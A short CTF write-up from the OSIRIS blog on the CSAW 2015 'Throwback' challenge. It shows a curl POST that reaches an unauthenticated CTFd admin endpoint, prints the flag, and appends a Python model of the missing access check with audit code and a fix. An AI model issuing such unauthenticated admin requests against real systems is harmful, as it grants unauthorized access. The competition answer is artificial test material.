OSIRIS Blog

CSAW CTF 2015 - Throwback

Vaughn Valle (8bitrosso)

Sep 21, 2015
  1. A recent bugfix to CTFd prevents unauthenticated admin calls: https://github.com/CTFd/CTFd/commit/9578355143d7af675fc4776b0f2de802be91e261.

  2. We make a POST request to the admin endpoint with cURL: curl -da=a https://ctf.isis.poly.edu/admin/chal/new.

  3. We get back the flag: flag{at_least_it_isnt_php}.

  4. Unwrap the flag (remove the flag{} around it), and we get the solution: at_least_it_isnt_php.
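
The bug class behind steps 1 and 2, as an added example (not CTFd's code and not part of the original write-up): a stdlib-only Python model of a route table in which one admin view is registered without its access check, plus two audits a maintainer can run as a regression test. The helper names (route, admins_only, dispatch and the two audit functions) and the /admin/chals route are assumptions made for illustration.

```python
from functools import wraps

ROUTES = {}  # (method, path) -> view; constructed stand-in for a web framework

def route(method, path):
    def register(view):
        ROUTES[(method, path)] = view
        return view
    return register

def admins_only(view):
    """Reject the call unless the session belongs to an admin."""
    @wraps(view)
    def guarded(session, form):
        if not session.get("admin"):
            return 403, "forbidden"
        return view(session, form)
    guarded.requires_admin = True  # marker the static audit looks for
    return guarded

@route("GET", "/admin/chals")  # hypothetical route, guarded correctly
@admins_only
def list_chals(session, form):
    return 200, "challenge list"

@route("POST", "/admin/chal/new")  # decorator forgotten: anonymous callers get in
def new_chal(session, form):
    return 200, "challenge created"

def dispatch(method, path, session=None, form=None):
    view = ROUTES.get((method, path))
    if view is None:
        return 404, "not found"
    return view(session or {}, form or {})

def unguarded_admin_routes(prefix="/admin"):
    """Static audit: admin-prefixed routes missing the admins_only marker."""
    return sorted(k for k, v in ROUTES.items()
                  if k[1].startswith(prefix) and not getattr(v, "requires_admin", False))

def leaky_admin_routes(prefix="/admin"):
    """Dynamic audit: admin routes that answer a request with no session."""
    return sorted(k for k in ROUTES
                  if k[1].startswith(prefix) and dispatch(*k)[0] not in (401, 403))

if __name__ == "__main__":
    print("before fix:", unguarded_admin_routes(), leaky_admin_routes())
    ROUTES[("POST", "/admin/chal/new")] = admins_only(new_chal)  # the fix
    print("after fix: ", unguarded_admin_routes(), leaky_admin_routes())
```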
